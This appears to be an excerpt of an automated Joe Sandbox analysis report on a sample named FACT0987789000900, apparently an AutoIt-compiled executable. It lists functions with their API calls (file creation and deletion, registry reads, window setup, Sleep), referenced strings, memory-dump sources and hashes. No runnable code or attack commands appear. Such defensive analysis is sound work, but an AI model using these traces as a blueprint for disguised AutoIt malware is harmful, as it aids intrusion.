__lseeki64_nolock.LIBCMT ref: 004C618B
__close_nolock.LIBCMT ref: 004C61EB

Part of subcall function 004BEA9C: CloseHandle.KERNELBASE(00000000,0053EEF4,00000000,?,004C6041,0053EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 004BEAEC
Part of subcall function 004BEA9C: GetLastError.KERNEL32(?,004C6041,0053EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 004BEAF6
Part of subcall function 004BEA9C: __free_osfhnd.LIBCMT ref: 004BEB03
Part of subcall function 004BEA9C: __dosmaperr.LIBCMT ref: 004BEB25

Part of subcall function 004B7C0E: __getptd_noexit.LIBCMT ref: 004B7C0E

__lseeki64_nolock.LIBCMT ref: 004C620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 004C6342
___createFile.LIBCMT ref: 004C6361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 004C636E
__dosmaperr.LIBCMT ref: 004C6375
__free_osfhnd.LIBCMT ref: 004C6395
__invoke_watson.LIBCMT ref: 004C63C3
__wsopen_helper.LIBCMT ref: 004C63DD

Strings

@, xrefs: 004C5F98

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: f3758d8e83f86817e60f6577ad1a02f51b6798a626c122a141cbdd163ada9404
Instruction ID: cd778c4c516eb0b3e9f872bcd9242bf35459ad04e066a32cbcc765137ba5cdbe
Opcode Fuzzy Hash: f3758d8e83f86817e60f6577ad1a02f51b6798a626c122a141cbdd163ada9404
Instruction Fuzzy Hash: E02223799006059BEB699F68CC45FEE7B31EB10314F25822EE822A73D1C23D9D80D759

Function 004BEE0E Relevance: 26.2, APIs: 17, Instructions: 664COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: ab37caf1cbe9409989b5f45213019e582d20ceafab03d889e289ecb50e80728b
Instruction ID: 717d9e84cbc28686dc5dddd3b9e1f4358750f6284342ee7717bdd6730f81459e
Opcode Fuzzy Hash: ab37caf1cbe9409989b5f45213019e582d20ceafab03d889e289ecb50e80728b
Instruction Fuzzy Hash: 53324670A042459FDB218F6CCC80BEEBBB1AF55314F24456BE8599B392C7389C4AC779

Function 004DFA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 004DFA96
_wcschr.LIBCMT ref: 004DFAA4
_wcscpy.LIBCMT ref: 004DFABB
_wcscat.LIBCMT ref: 004DFACA
_wcscat.LIBCMT ref: 004DFAE8
_wcscpy.LIBCMT ref: 004DFB09
__wsplitpath.LIBCMT ref: 004DFBE6
_wcscpy.LIBCMT ref: 004DFC0B
_wcscpy.LIBCMT ref: 004DFC1D
_wcscpy.LIBCMT ref: 004DFC32
_wcscat.LIBCMT ref: 004DFC47
_wcscat.LIBCMT ref: 004DFC59
_wcscat.LIBCMT ref: 004DFC6E

Part of subcall function 004DBFA4: _wcscmp.LIBCMT ref: 004DC03E
Part of subcall function 004DBFA4: __wsplitpath.LIBCMT ref: 004DC083
Part of subcall function 004DBFA4: _wcscpy.LIBCMT ref: 004DC096
Part of subcall function 004DBFA4: _wcscat.LIBCMT ref: 004DC0A9
Part of subcall function 004DBFA4: __wsplitpath.LIBCMT ref: 004DC0CE
Part of subcall function 004DBFA4: _wcscat.LIBCMT ref: 004DC0E4
Part of subcall function 004DBFA4: _wcscat.LIBCMT ref: 004DC0F7

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 004DFA61

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 2955681530-2806939583
Opcode ID: 4a55a62f13dd33f9664dcc34b1657b3170d166b7aa17d790a6aac63fc77c0398
Instruction ID: 478b8590bf668383ae9041a163d1a70ad9250de41c94a2e3f0b1de8fba9a0fa1
Opcode Fuzzy Hash: 4a55a62f13dd33f9664dcc34b1657b3170d166b7aa17d790a6aac63fc77c0398
Instruction Fuzzy Hash: 2A919071504205AFDF20EB55C851E9BB7E8BF84318F00486FF94A97391DB39EA48CB99

Function 004DBFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004DBDB4: __time64.LIBCMT ref: 004DBDBE

Part of subcall function 00494517: _fseek.LIBCMT ref: 0049452F

__wsplitpath.LIBCMT ref: 004DC083

Part of subcall function 004B1DFC: __wsplitpath_helper.LIBCMT ref: 004B1E3C

_wcscpy.LIBCMT ref: 004DC096
_wcscat.LIBCMT ref: 004DC0A9
__wsplitpath.LIBCMT ref: 004DC0CE
_wcscat.LIBCMT ref: 004DC0E4
_wcscat.LIBCMT ref: 004DC0F7
_wcscmp.LIBCMT ref: 004DC03E

Part of subcall function 004DC56D: _wcscmp.LIBCMT ref: 004DC65D
Part of subcall function 004DC56D: _wcscmp.LIBCMT ref: 004DC670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004DC2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004DC338
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004DC34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004DC35F
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004DC371

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID:
API String ID: 2378138488-0
Opcode ID: 48ca6559c02c703cf74ac9092ac1fdbfdaf3bfc80e998037978b3481d8f6127c
Instruction ID: c3cfeb4c1b221b688838c23a3cb8a23171ef06fbca0a4d82c54c866c66bf00f1
Opcode Fuzzy Hash: 48ca6559c02c703cf74ac9092ac1fdbfdaf3bfc80e998037978b3481d8f6127c
Instruction Fuzzy Hash: C6C139B1D00229ABDF11DF95CC91EDEBBBDAF49304F0040ABB609E6251DB349A45CF65

Function 00493E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00493E79
LoadCursorW.USER32(00000000,00007F00), ref: 00493E88
LoadIconW.USER32(00000063), ref: 00493E9E
LoadIconW.USER32(000000A4), ref: 00493EB0
LoadIconW.USER32(000000A2), ref: 00493EC2

Part of subcall function 00494024: LoadImageW.USER32(00490000,00000063,00000001,00000010,00000010,00000000), ref: 00494048

RegisterClassExW.USER32(?), ref: 00493F30

Part of subcall function 00493F53: GetSysColorBrush.USER32(0000000F), ref: 00493F86
Part of subcall function 00493F53: RegisterClassExW.USER32(00000030), ref: 00493FB0
Part of subcall function 00493F53: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00493FC1
Part of subcall function 00493F53: LoadIconW.USER32(000000A9), ref: 00494004

Strings

0, xrefs: 00493F02
AutoIt v3, xrefs: 00493F1F
#, xrefs: 00493F09

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
String ID: #$0$AutoIt v3
API String ID: 2880975755-4155596026
Opcode ID: c1e81ce2b57f54a2de9ad122bea48d1a958c718783606fa5560d16f8bcd61946
Instruction ID: 1617d1b9b6e88a3b09637b0d220583fc189a5b2080cda277f51ad40de9a71310
Opcode Fuzzy Hash: c1e81ce2b57f54a2de9ad122bea48d1a958c718783606fa5560d16f8bcd61946
Instruction Fuzzy Hash: 2E214CB0D00704ABCB00DFA9ED59B9DBFF5FB58311F00816AE214A22A0D7754648EBA9

Function 00493F53 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53
registrywindowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00493F86
RegisterClassExW.USER32(00000030), ref: 00493FB0
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00493FC1
LoadIconW.USER32(000000A9), ref: 00494004

Strings

0, xrefs: 00493F68
+, xrefs: 00493F6F
TaskbarCreated, xrefs: 00493FB6
AutoIt v3 GUI, xrefs: 00493FA2

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Register$BrushClassClipboardColorFormatIconLoad
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 975902462-1005189915
Opcode ID: de845ac7979ea9d50eccf54c592ee9a3e84c06f22a6123b6f721a10cd3fe74b9
Instruction ID: 741ff10c95782fb8b39dcbd7fd2a0b1891f4990146b4d40b38a5c4f80b7ce6b7
Opcode Fuzzy Hash: de845ac7979ea9d50eccf54c592ee9a3e84c06f22a6123b6f721a10cd3fe74b9
Instruction Fuzzy Hash: 3721C7B5901318AFDB00DFA4E899BCDBFB4FB28741F10811AF515A62A0D7B44548AFA5

Function 01347490 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 013474D5

Memory Dump Source

Source File: 00000003.00000002.1300511747.0000000001346000.00000040.00000020.00020000.00000000.sdmp, Offset: 01346000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1346000_FACT0987789000900.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: f0d5bba223af70979df6cb7ab96c9ecd2fe8b7ee4f3a5ee7b8ae827c530604be
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: 2B511C75A10248FBDF20DFA4CC49FEE77B9AF48714F108554FA09EA180DB74A6448B64

Function 004949FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00494A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 005041DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0050421A
RegCloseKey.ADVAPI32(?), ref: 00504249

Strings

Software\AutoIt v3\AutoIt, xrefs: 00494A13
Include, xrefs: 005041D3, 00504212

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: 803807a1acc4216c75796a854ed70f8bb2ba571ef9f12390689854088573293e
Instruction ID: 9d5c585125a03a1272796e327cc751a10c6a24f625fb3d9d2839b18f4f2088b9
Opcode Fuzzy Hash: 803807a1acc4216c75796a854ed70f8bb2ba571ef9f12390689854088573293e
Instruction Fuzzy Hash: 95116D71600119BEEB00ABA4DD8ADEF7BBCEF19344F004069B506E2191EA74AE06DB64

Function 004936B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004936E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00493707
ShowWindow.USER32(00000000,?,?,?,?,00493AA3,?), ref: 0049371B
ShowWindow.USER32(00000000,?,?,?,?,00493AA3,?), ref: 00493724

Strings

edit, xrefs: 00493701
AutoIt v3, xrefs: 004936DE, 004936E3, 004936E4

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: a2637944bea2773fb6acd9cae5d3314324b59edd5fc97ec506e890fd86960628
Instruction ID: 3c58eb7c799c0431e1fa95d7d5357c20df64fa2901ede2f68aee24aeff74dc03
Opcode Fuzzy Hash: a2637944bea2773fb6acd9cae5d3314324b59edd5fc97ec506e890fd86960628
Instruction Fuzzy Hash: 2FF0DA715407D47BE7315757AC1CF6B2E7DE7E7F21B00411ABA04A21F0C6650899EAB8

Function 004951AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0049522F
_wcscpy.LIBCMT ref: 00495283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00495293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00503CB0

Strings

Line: , xrefs: 00503CD9

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: 38c660afd3f04f2c5b3f1330aa174851e3cfb7861211e9131ea586287ad68f83
Instruction ID: 8e92e208b3d5ea42027c9bba223b6102b31f287cc1c1338300e5d6e929e5b3a5
Opcode Fuzzy Hash: 38c660afd3f04f2c5b3f1330aa174851e3cfb7861211e9131ea586287ad68f83
Instruction Fuzzy Hash: BE31C0314087406BDB21EB61EC46FDA7FD8AB44308F10452FF585821E1EB78A54CCB9A

Function 004940E5 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00503725

Part of subcall function 0049660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004953B1,?,?,004961FF,?,00000000,00000001,00000000), ref: 0049662F

Part of subcall function 004940A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004940C6

Strings

X, xrefs: 0050373E
au3, xrefs: 00503768
AutoIt script files (*.au3, *.a3x), xrefs: 00503753
Run Script:, xrefs: 00503745

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: NamePath$FullLong_memset
String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$X$au3
API String ID: 3051022977-1954568251
Opcode ID: 25660c453ac23ac9dbcfe8915e621b45109fd1deec2cac343fbb4ff487b96a66
Instruction ID: dddaa1c2e6107c506747973b1e536037d118504843350736662012460e850fae
Opcode Fuzzy Hash: 25660c453ac23ac9dbcfe8915e621b45109fd1deec2cac343fbb4ff487b96a66
Instruction Fuzzy Hash: 4321AB719101589BCF01DF95C845BDE7FFCAF89308F00406EE405A7281DBB85A898F65

Function 00494139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON

Download Yara Rule

APIs

Part of subcall function 004941A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004939FE,?,00000001), ref: 004941DB

_free.LIBCMT ref: 005036B7
_free.LIBCMT ref: 005036FE

Part of subcall function 0049C833: __wsplitpath.LIBCMT ref: 0049C93E
Part of subcall function 0049C833: _wcscpy.LIBCMT ref: 0049C953
Part of subcall function 0049C833: _wcscat.LIBCMT ref: 0049C968
Part of subcall function 0049C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0049C978

Strings

Bad directive syntax error, xrefs: 005036E4
>>>AUTOIT SCRIPT<<<, xrefs: 00503491

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 805182592-1757145024
Opcode ID: 0fb88f591884323bc4cddd8e5281ab118d7c5b07429d50c354fed021b6b3bec5
Instruction ID: 4de2bfeb1874814fa322d7a916910401292c16d4f5eef91c3f2a5fbdc61169d4
Opcode Fuzzy Hash: 0fb88f591884323bc4cddd8e5281ab118d7c5b07429d50c354fed021b6b3bec5
Instruction Fuzzy Hash: 42918271910219AFCF04EFA5CC919EDBBB8BF19314F10442EF816AB2D1DB35AA05CB94

Function 01348F50 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

Part of subcall function 01348E40: Sleep.KERNELBASE(000001F4), ref: 01348E51

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0134907D

Strings

QT5QIERKYZPGA2JIFXW, xrefs: 013490FD, 01349100

Memory Dump Source

Source File: 00000003.00000002.1300511747.0000000001346000.00000040.00000020.00020000.00000000.sdmp, Offset: 01346000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1346000_FACT0987789000900.jbxd

Similarity

API ID: CreateFileSleep
String ID: QT5QIERKYZPGA2JIFXW
API String ID: 2694422964-1725631792
Opcode ID: 7a8ac76ae711c0f1efe4810ba4346e7c784060ee27eca4a82c2dff4b2e62916b
Instruction ID: f82178cc423b81a697da68b22adec107cba38e786e2905902e14e099ca00bb9b
Opcode Fuzzy Hash: 7a8ac76ae711c0f1efe4810ba4346e7c784060ee27eca4a82c2dff4b2e62916b
Instruction Fuzzy Hash: 2E516F70D04249DBEF11DBE4C858BEFBBB9AF19308F004599E608BB2C1D6795B44CBA5

Function 00494A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00495374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00551148,?,004961FF,?,00000000,00000001,00000000), ref: 00495392

Part of subcall function 004949FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00494A1D

_wcscat.LIBCMT ref: 00502D80
_wcscat.LIBCMT ref: 00502DB5

Strings

\Include\, xrefs: 00494B0A
\, xrefs: 00502DA2

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: \$\Include\
API String ID: 3592542968-2640467822
Opcode ID: a98871a1b7a31e8ef263e75cfc834fc292efdff17531883610486f0dabdbfeae
Instruction ID: 48b0dae4b309265862a27c7f033d94dc5a2d0864fd5258bdb0bc2fef6e1fc687
Opcode Fuzzy Hash: a98871a1b7a31e8ef263e75cfc834fc292efdff17531883610486f0dabdbfeae
